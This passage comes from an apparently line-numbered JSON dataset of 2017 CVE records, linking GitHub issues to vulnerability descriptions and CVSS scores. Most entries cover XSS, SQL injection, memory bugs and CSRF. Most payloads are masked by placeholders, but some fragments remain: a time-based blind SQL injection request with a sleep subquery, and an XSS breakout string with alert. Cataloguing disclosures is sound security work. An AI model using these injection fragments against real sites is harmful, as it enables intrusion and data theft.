  12497. "Issue_Url_old": "https://github.com/exponentcms/exponent-cms/issues/73",
  12498. "Issue_Url_new": "https://github.com/exponentcms/exponent-cms/issues/73",
  12499. "Repo_new": "exponentcms/exponent-cms",
  12500. "Issue_Created_At": "2017-02-06T09:00:59Z",
  12501. "description": "Time Based SQL Injection Exponent CMS NUMBERTAG and others versions. This is a blind SQL injection that can be exploited by un authenticated users via an HTTP GET request and which can be used to dump database data out to a malicious server, using an out of band technique, such as APITAG The vulnerability affects FILETAG andthe following parameter: src. APITAG example: GET APITAG NUMBERTAG b(select from(select(sleep NUMBERTAG a NUMBERTAG b\\ HTTP NUMBERTAG Host: localhost Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close FILETAG How to fix: URLTAG",
  12502. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12503. "severity": "CRITICAL",
  12504. "baseScore": 9.8,
  12505. "impactScore": 5.9,
  12506. "exploitabilityScore": 3.9
  12507. },
  12508. {
  12509. "CVE_ID": "CVE-2017-5923",
  12510. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/597",
  12511. "Issue_Url_new": "https://github.com/virustotal/yara/issues/597",
  12512. "Repo_new": "virustotal/yara",
  12513. "Issue_Created_At": "2017-01-23T11:29:59Z",
  12514. "description": "Heap out of bounds read in APITAG Heap out of bounds read in APITAG Git HEAD: APITAG To reproduce: APITAG FILETAG ASAN: ERRORTAG",
  12515. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  12516. "severity": "HIGH",
  12517. "baseScore": 7.5,
  12518. "impactScore": 3.6,
  12519. "exploitabilityScore": 3.9
  12520. },
  12521. {
  12522. "CVE_ID": "CVE-2017-5924",
  12523. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/593",
  12524. "Issue_Url_new": "https://github.com/virustotal/yara/issues/593",
  12525. "Repo_new": "virustotal/yara",
  12526. "Issue_Created_At": "2017-01-08T11:32:08Z",
  12527. "description": "Use after free in APITAG Use after free in APITAG Tested on latest Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
  12528. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  12529. "severity": "HIGH",
  12530. "baseScore": 7.5,
  12531. "impactScore": 3.6,
  12532. "exploitabilityScore": 3.9
  12533. },
  12534. {
  12535. "CVE_ID": "CVE-2017-5938",
  12536. "Issue_Url_old": "https://github.com/viewvc/viewvc/issues/137",
  12537. "Issue_Url_new": "https://github.com/viewvc/viewvc/issues/137",
  12538. "Repo_new": "viewvc/viewvc",
  12539. "Issue_Created_At": "2017-01-24T23:46:38Z",
  12540. "description": "XSS vulnerability in nav_path template data. APITAG does not properly escape the names of versioned directories and files before making them available for use via its APITAG HTML template variables. These variables are used in APITAG default templates, and would likely be used in folks' customized templates, too. A user with commit privileges to the repository could introduce a versioned directory or file with a name that contains an executable script (e.g., ERRORTAG ), and the script would be evaluated upon a user's navigation (via web browser) to APITAG view of that directory or file.",
  12541. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12542. "severity": "MEDIUM",
  12543. "baseScore": 6.1,
  12544. "impactScore": 2.7,
  12545. "exploitabilityScore": 2.8
  12546. },
  12547. {
  12548. "CVE_ID": "CVE-2017-5945",
  12549. "Issue_Url_old": "https://github.com/justinhunt/moodle-filter_poodll/issues/23",
  12550. "Issue_Url_new": "https://github.com/justinhunt/moodle-filter_poodll/issues/23",
  12551. "Repo_new": "justinhunt/moodle-filter_poodll",
  12552. "Issue_Created_At": "2017-01-09T09:59:55Z",
  12553. "description": "Moodle NUMBERTAG Plugin APITAG Filter\u201d \u2013 Cross Site Scripting(XSS). Hello: Moodle NUMBERTAG Plugin APITAG Filter\u201d \u2013 Cross Site Scripting(XSS) Product: Moodle plugin APITAG Filter\u201d Download url: URLTAG Vulnerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in Moodle plugin APITAG Filter\u201d, which can be exploited to add, modify or delete information in the application's database and gain complete control over the application. The vulnerability exists due to insufficient filtration of user supplied data in \u201cpoodll_audio_url\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: POC: URLTAG APITAG NUMBERTAG Could you please help me assign a CVE for this issue?",
  12554. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12555. "severity": "MEDIUM",
  12556. "baseScore": 6.1,
  12557. "impactScore": 2.7,
  12558. "exploitabilityScore": 2.8
  12559. },
  12560. {
  12561. "CVE_ID": "CVE-2017-5946",
  12562. "Issue_Url_old": "https://github.com/rubyzip/rubyzip/issues/315",
  12563. "Issue_Url_new": "https://github.com/rubyzip/rubyzip/issues/315",
  12564. "Repo_new": "rubyzip/rubyzip",
  12565. "Issue_Created_At": "2017-02-04T13:14:48Z",
  12566. "description": "Directory traversal vulnerability. Overview The Rubyzip module allows overwriting or creating arbitrary files via relative filenames and thus executing malicious code, e.g. by writing to APITAG ~/.bashrc etc. Proof of concept: ERRORTAG rubyzip_test_traversal.rb : CODETAG Vulnerable version and test environment ERRORTAG Analogous vulnerability in minitar gem: URLTAG",
  12567. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12568. "severity": "CRITICAL",
  12569. "baseScore": 9.8,
  12570. "impactScore": 5.9,
  12571. "exploitabilityScore": 3.9
  12572. },
  12573. {
  12574. "CVE_ID": "CVE-2017-5950",
  12575. "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/459",
  12576. "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/459",
  12577. "Repo_new": "jbeder/yaml-cpp",
  12578. "Issue_Created_At": "2017-01-17T14:35:37Z",
  12579. "description": "Stack Overflow in APITAG Stack Overflow in APITAG Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
  12580. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  12581. "severity": "MEDIUM",
  12582. "baseScore": 5.5,
  12583. "impactScore": 3.6,
  12584. "exploitabilityScore": 1.8
  12585. },
  12586. {
  12587. "CVE_ID": "CVE-2017-5954",
  12588. "Issue_Url_old": "https://github.com/commenthol/serialize-to-js/issues/1",
  12589. "Issue_Url_new": "https://github.com/commenthol/serialize-to-js/issues/1",
  12590. "Repo_new": "commenthol/serialize-to-js",
  12591. "Issue_Created_At": "2017-02-09T08:11:43Z",
  12592. "description": "APITAG can be abused to achieve arbitrary code injection with an IIFE. ERRORTAG I don't know if this is a functionality as you are using APITAG internally, but the module should not execute code on deserialization.",
  12593. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12594. "severity": "CRITICAL",
  12595. "baseScore": 9.8,
  12596. "impactScore": 5.9,
  12597. "exploitabilityScore": 3.9
  12598. },
  12599. {
  12600. "CVE_ID": "CVE-2017-5959",
  12601. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/70",
  12602. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/70",
  12603. "Repo_new": "semplon/genixcms",
  12604. "Issue_Created_At": "2017-02-09T13:23:36Z",
  12605. "description": "CSRF in background management of NUMBERTAG latest version). APITAG implements a token to defend against CSRF in the background management webpage. An attacker is able to bypass the defense as follows: First, visit the FILETAG page and grab a token, which can be used to launch a CSRF attack: APITAG Then, use the following APITAG token used following is in another test.): CODETAG Finally, the response demonstrated that the token is valid: APITAG Thus, we bypass the defense against CSRF, and are able to add an admin account of APITAG",
  12606. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12607. "severity": "CRITICAL",
  12608. "baseScore": 9.8,
  12609. "impactScore": 5.9,
  12610. "exploitabilityScore": 3.9
  12611. },
  12612. {
  12613. "CVE_ID": "CVE-2017-5960",
  12614. "Issue_Url_old": "https://github.com/PhalconEye/phalconeye/issues/133",
  12615. "Issue_Url_new": "https://github.com/phalconeye/phalconeye/issues/133",
  12616. "Repo_new": "phalconeye/phalconeye",
  12617. "Issue_Created_At": "2017-02-10T04:55:21Z",
  12618. "description": "Phalcon Eye Multiple Cross Site Scripting (XSS). Product: Phalcon Eye Vendor: Phalcon ( URLTAG Vulnerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered Multiple Cross Site Scripting (XSS) in Phalcon Eye, which can be exploited to add, modify or delete information in the application's database and gain complete control over the application. The vulnerability exists due to insufficient filtration of user supplied data in multiple HTTP GET parameters passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebo NUMBERTAG URLTAG APITAG NUMBERTAG URLTAG APITAG Could you please help me assign a CVE for this issue?",
  12619. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12620. "severity": "MEDIUM",
  12621. "baseScore": 6.1,
  12622. "impactScore": 2.7,
  12623. "exploitabilityScore": 2.8
  12624. },
  12625. {
  12626. "CVE_ID": "CVE-2017-5961",
  12627. "Issue_Url_old": "https://github.com/ionize/ionize/issues/393",
  12628. "Issue_Url_new": "https://github.com/ionize/ionize/issues/393",
  12629. "Repo_new": "ionize/ionize",
  12630. "Issue_Created_At": "2017-02-10T04:42:51Z",
  12631. "description": "ionize NUMBERTAG Cross Site Scripting (XSS). Product: ionize Vendor: ionize ( FILETAG Vulnerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in ionize, which can be exploited to add, modify or delete information in the application's database and gain complete control over the application. The vulnerability exists due to insufficient filtration of user supplied data in \u201cpath\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: URLTAG Could you please help me assign a CVE for this issue?",
  12632. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12633. "severity": "MEDIUM",
  12634. "baseScore": 6.1,
  12635. "impactScore": 2.7,
  12636. "exploitabilityScore": 2.8
  12637. },
  12638. {
  12639. "CVE_ID": "CVE-2017-5964",
  12640. "Issue_Url_old": "https://github.com/emoncms/emoncms/issues/636",
  12641. "Issue_Url_new": "https://github.com/emoncms/emoncms/issues/636",
  12642. "Repo_new": "emoncms/emoncms",
  12643. "Issue_Created_At": "2017-02-11T17:17:31Z",
  12644. "description": "Emoncms NUMBERTAG latest version) Multiple Cross Site Scripting (XSS). Product: Emoncms NUMBERTAG unlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered multiple Cross Site Scripting (XSS) in Emoncms NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in multiple HTTP GET parameters passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebo NUMBERTAG URLTAG NUMBERTAG URLTAG Could you please help me assign a CVE for this issue?",
  12645. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12646. "severity": "MEDIUM",
  12647. "baseScore": 6.1,
  12648. "impactScore": 2.7,
  12649. "exploitabilityScore": 2.8
  12650. },
  12651. {
  12652. "CVE_ID": "CVE-2017-5990",
  12653. "Issue_Url_old": "https://github.com/phreebooks/PhreeBooksERP/issues/230",
  12654. "Issue_Url_new": "https://github.com/phreebooks/phreebookserp/issues/230",
  12655. "Repo_new": "phreebooks/PhreeBooksERP",
  12656. "Issue_Created_At": "2017-02-11T17:38:17Z",
  12657. "description": "APITAG NUMBERTAG latest version) Multiple Cross Site Scripting (XSS). Product: APITAG Vulnerable Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered multiple Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \"form\" HTTP GET parameter passed to PATHTAG and PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebo NUMBERTAG URLTAG NUMBERTAG URLTAG Could you please help me assign a CVE for this issue?",
  12658. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12659. "severity": "MEDIUM",
  12660. "baseScore": 6.1,
  12661. "impactScore": 2.7,
  12662. "exploitabilityScore": 2.8
  12663. },
  12664. {
  12665. "CVE_ID": "CVE-2017-6059",
  12666. "Issue_Url_old": "https://github.com/pingidentity/mod_auth_openidc/issues/212",
  12667. "Issue_Url_new": "https://github.com/openidc/mod_auth_openidc/issues/212",
  12668. "Repo_new": "openidc/mod_auth_openidc",
  12669. "Issue_Created_At": "2017-01-18T15:44:38Z",
  12670. "description": "Don't show user supplied content in error pages. First: Thanks for this awesome Apache module! :) \ud83d\ude80 Via our Bug Bounty program URLTAG we got some reports of Text Injections in the error pages such as APITAG which would render as: ERRORTAG While I don't really see this as security relevant issue since spaces etc. are properly converted it would be awesome if the error messages would not show the user supplied content as I'm sure I'll have otherwise to cope with some more of these reports :)",
  12671. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  12672. "severity": "HIGH",
  12673. "baseScore": 7.5,
  12674. "impactScore": 3.6,
  12675. "exploitabilityScore": 3.9
  12676. },
  12677. {
  12678. "CVE_ID": "CVE-2017-6062",
  12679. "Issue_Url_old": "https://github.com/pingidentity/mod_auth_openidc/issues/222",
  12680. "Issue_Url_new": "https://github.com/openidc/mod_auth_openidc/issues/222",
  12681. "Repo_new": "openidc/mod_auth_openidc",
  12682. "Issue_Created_At": "2017-01-30T18:06:27Z",
  12683. "description": "Security issue: APITAG pass does not scrub request headers. It seems that when ERRORTAG is set to pass the APITAG headers are not being scrubbed. I am using a configuration as follows: ERRORTAG And as expected I can make unauthenticated requests to APITAG . However if I set my browser to send the APITAG header then this gets passed through to the application, letting me spoof any username. Unless I'm missing something this seems like a rather serious security issue.",
  12684. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
  12685. "severity": "HIGH",
  12686. "baseScore": 8.6,
  12687. "impactScore": 4.0,
  12688. "exploitabilityScore": 3.9
  12689. },
  12690. {
  12691. "CVE_ID": "CVE-2017-6065",
  12692. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/71",
  12693. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/71",
  12694. "Repo_new": "semplon/genixcms",
  12695. "Issue_Created_At": "2017-02-13T10:16:39Z",
  12696. "description": "SQL injection vulnerability in PATHTAG in APITAG NUMBERTAG latest) discovered by APITAG of Venustech\". PATHTAG (line NUMBERTAG CODETAG The APITAG function in PATHTAG (line NUMBERTAG ERRORTAG The update function in PATHTAG (line NUMBERTAG ERRORTAG We'll find that the \"$key\" in $set .= \" APITAG = '$val',\"; isn't be filtered, which leads to SQL injection. APITAG URLTAG POST parameters: CODETAG Don't forget to get a token first.",
  12697. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  12698. "severity": "HIGH",
  12699. "baseScore": 8.8,
  12700. "impactScore": 5.9,
  12701. "exploitabilityScore": 2.8
  12702. },
  12703. {
  12704. "CVE_ID": "CVE-2017-6099",
  12705. "Issue_Url_old": "https://github.com/paypal/merchant-sdk-php/issues/129",
  12706. "Issue_Url_new": "https://github.com/paypal/merchant-sdk-php/issues/129",
  12707. "Repo_new": "paypal/merchant-sdk-php",
  12708. "Issue_Created_At": "2017-02-10T16:54:23Z",
  12709. "description": "I have found a Reflected XSS vulnerability in this sdk. Hello: I have found a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in \u201ctoken\u201d HTTP GET parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on _GET FILETAG So if an attacker constructs a special url as follows and sends it to a victim, when the victim clicks the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG APITAG The following screenshot is the result of clicking the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  12710. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12711. "severity": "MEDIUM",
  12712. "baseScore": 6.1,
  12713. "impactScore": 2.7,
  12714. "exploitabilityScore": 2.8
  12715. },
  12716. {
  12717. "CVE_ID": "CVE-2017-6188",
  12718. "Issue_Url_old": "https://github.com/munin-monitoring/munin/issues/721",
  12719. "Issue_Url_new": "https://github.com/munin-monitoring/munin/issues/721",
  12720. "Repo_new": "munin-monitoring/munin",
  12721. "Issue_Created_At": "2016-07-27T10:07:37Z",
  12722. "description": "munin cgi graph CGI::param security problem. Running munin NUMBERTAG on Gentoo. I observed this message in the logs PATHTAG NUMBERTAG PERL WARNING] CGI::param called in list context from PATHTAG line NUMBERTAG this can lead to vulnerabilities. See the warning in APITAG the value or values of a single named parameter\" at PATHTAG line ERRORTAG . This allows injecting options into munin cgi graph (similar to URLTAG ), by doing something like this: PATHTAG which wrote the graph to /tmp/test.txt",
  12723. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  12724. "severity": "MEDIUM",
  12725. "baseScore": 5.5,
  12726. "impactScore": 3.6,
  12727. "exploitabilityScore": 1.8
  12728. },
  12729. {
  12730. "CVE_ID": "CVE-2017-6194",
  12731. "Issue_Url_old": "https://github.com/radare/radare2/issues/6829",
  12732. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6829",
  12733. "Repo_new": "radareorg/radare2",
  12734. "Issue_Created_At": "2017-02-21T17:57:07Z",
  12735. "description": "Heap buffer overflow in APITAG Heap buffer overflow in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  12736. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12737. "severity": "HIGH",
  12738. "baseScore": 7.8,
  12739. "impactScore": 5.9,
  12740. "exploitabilityScore": 1.8
  12741. },
  12742. {
  12743. "CVE_ID": "CVE-2017-6197",
  12744. "Issue_Url_old": "https://github.com/radare/radare2/issues/6816",
  12745. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6816",
  12746. "Repo_new": "radareorg/radare2",
  12747. "Issue_Created_At": "2017-02-19T19:33:03Z",
  12748. "description": "Null pointer dereference in APITAG Null pointer dereference in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  12749. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  12750. "severity": "MEDIUM",
  12751. "baseScore": 5.5,
  12752. "impactScore": 3.6,
  12753. "exploitabilityScore": 1.8
  12754. },
  12755. {
  12756. "CVE_ID": "CVE-2017-6213",
  12757. "Issue_Url_old": "https://github.com/paypal/invoice-sdk-php/issues/13",
  12758. "Issue_Url_new": "https://github.com/paypal/invoice-sdk-php/issues/13",
  12759. "Repo_new": "paypal/invoice-sdk-php",
  12760. "Issue_Created_At": "2017-02-21T10:11:31Z",
  12761. "description": "I have found a Reflected XSS vulnerability in this sdk. Hello: I have found a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in \u201cverification_code\u201d HTTP GET parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if an attacker constructs a special url as follows and sends it to a victim, when the victim clicks the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The following screenshot is the result of clicking the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
  12762. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  12763. "severity": "MEDIUM",
  12764. "baseScore": 5.4,
  12765. "impactScore": 2.7,
  12766. "exploitabilityScore": 2.3
  12767. },
  12768. {
  12769. "CVE_ID": "CVE-2017-6215",
  12770. "Issue_Url_old": "https://github.com/paypal/permissions-sdk-php/issues/19",
  12771. "Issue_Url_new": "https://github.com/paypal/permissions-sdk-php/issues/19",
  12772. "Repo_new": "paypal/permissions-sdk-php",
  12773. "Issue_Created_At": "2017-02-21T10:28:14Z",
  12774. "description": "I have found a Reflected XSS vulnerability in this sdk. Hello: I have found a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in \u201cverification_code\u201d HTTP REQUEST parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if an attacker constructs a special url as follows and sends it to a victim, when the victim clicks the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The following screenshot is the result of clicking the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
  12775. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  12776. "severity": "MEDIUM",
  12777. "baseScore": 5.4,
  12778. "impactScore": 2.7,
  12779. "exploitabilityScore": 2.3
  12780. },
  12781. {
  12782. "CVE_ID": "CVE-2017-6216",
  12783. "Issue_Url_old": "https://github.com/novaksolutions/infusionsoft-php-sdk/issues/111",
  12784. "Issue_Url_new": "https://github.com/novaksolutions/infusionsoft-php-sdk/issues/111",
  12785. "Repo_new": "novaksolutions/infusionsoft-php-sdk",
  12786. "Issue_Created_At": "2017-02-23T03:41:11Z",
  12787. "description": "A Reflected XSS vulnerability in this sdk. Hello: I found a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP _REQUEST parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
  12788. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12789. "severity": "MEDIUM",
  12790. "baseScore": 6.1,
  12791. "impactScore": 2.7,
  12792. "exploitabilityScore": 2.8
  12793. },
  12794. {
  12795. "CVE_ID": "CVE-2017-6217",
  12796. "Issue_Url_old": "https://github.com/paypal/adaptivepayments-sdk-php/issues/87",
  12797. "Issue_Url_new": "https://github.com/paypal/adaptivepayments-sdk-php/issues/87",
  12798. "Repo_new": "paypal/adaptivepayments-sdk-php",
  12799. "Issue_Created_At": "2017-02-21T10:03:58Z",
  12800. "description": "I have find a Reflected XSS vulnerability in this sdk. Hello: I have find a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP GET parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
  12801. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12802. "severity": "MEDIUM",
  12803. "baseScore": 6.1,
  12804. "impactScore": 2.7,
  12805. "exploitabilityScore": 2.8
  12806. },
  12807. {
  12808. "CVE_ID": "CVE-2017-6319",
  12809. "Issue_Url_old": "https://github.com/radare/radare2/issues/6836",
  12810. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6836",
  12811. "Repo_new": "radareorg/radare2",
  12812. "Issue_Created_At": "2017-02-23T18:09:20Z",
  12813. "description": "SIGSEGV in APITAG SIGSEGV in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  12814. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12815. "severity": "HIGH",
  12816. "baseScore": 7.8,
  12817. "impactScore": 5.9,
  12818. "exploitabilityScore": 1.8
  12819. },
  12820. {
  12821. "CVE_ID": "CVE-2017-6362",
  12822. "Issue_Url_old": "https://github.com/libgd/libgd/issues/381",
  12823. "Issue_Url_new": "https://github.com/libgd/libgd/issues/381",
  12824. "Repo_new": "libgd/libgd",
  12825. "Issue_Created_At": "2017-02-14T09:42:07Z",
  12826. "description": "libgd double free vulnerability. Description I find the libgd double free vulnerability when call APITAG function. Environment Ubuntu NUMBERTAG libgd NUMBERTAG APITAG commit APITAG Detail ERRORTAG the c code CODETAG",
  12827. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  12828. "severity": "HIGH",
  12829. "baseScore": 7.5,
  12830. "impactScore": 3.6,
  12831. "exploitabilityScore": 3.9
  12832. },
  12833. {
  12834. "CVE_ID": "CVE-2017-6363",
  12835. "Issue_Url_old": "https://github.com/libgd/libgd/issues/383",
  12836. "Issue_Url_new": "https://github.com/libgd/libgd/issues/383",
  12837. "Repo_new": "libgd/libgd",
  12838. "Issue_Created_At": "2017-02-17T16:51:11Z",
  12839. "description": "Invalid read when call APITAG Description ======== Hi, when I fuzz the libgd, a invalid read occurs within the function APITAG of gd_tiff.c, it can be triggered by the FILETAG Valgrind tracker ======== ERRORTAG",
  12840. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  12841. "severity": "HIGH",
  12842. "baseScore": 8.1,
  12843. "impactScore": 5.2,
  12844. "exploitabilityScore": 2.8
  12845. },
  12846. {
  12847. "CVE_ID": "CVE-2017-6387",
  12848. "Issue_Url_old": "https://github.com/radare/radare2/issues/6857",
  12849. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6857",
  12850. "Repo_new": "radareorg/radare2",
  12851. "Issue_Created_At": "2017-02-27T13:23:17Z",
  12852. "description": "Out of bounds read in APITAG Out of bounds read in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: r2 A r2_hoobr_dex_loadcode ASAN: ERRORTAG",
  12853. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  12854. "severity": "MEDIUM",
  12855. "baseScore": 5.5,
  12856. "impactScore": 3.6,
  12857. "exploitabilityScore": 1.8
  12858. },
  12859. {
  12860. "CVE_ID": "CVE-2017-6390",
  12861. "Issue_Url_old": "https://github.com/soruly/whatanime.ga/issues/8",
  12862. "Issue_Url_new": "https://github.com/soruly/trace.moe/issues/8",
  12863. "Repo_new": "soruly/trace.moe",
  12864. "Issue_Created_At": "2017-02-27T18:14:23Z",
  12865. "description": "whatanime.ga (lastest version) Cross Site Scripting (XSS). Product\uff1awhatanime.ga Download: FILETAG Vunlerable Version: lastest version and probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201curl\u201d HTTP GET parameter passed to \u201cwhatanime.ga APITAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  12866. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12867. "severity": "MEDIUM",
  12868. "baseScore": 6.1,
  12869. "impactScore": 2.7,
  12870. "exploitabilityScore": 2.8
  12871. },
  12872. {
  12873. "CVE_ID": "CVE-2017-6391",
  12874. "Issue_Url_old": "https://github.com/kaltura/server/issues/5300",
  12875. "Issue_Url_new": "https://github.com/kaltura/server/issues/5300",
  12876. "Repo_new": "kaltura/server",
  12877. "Issue_Created_At": "2017-02-27T14:43:53Z",
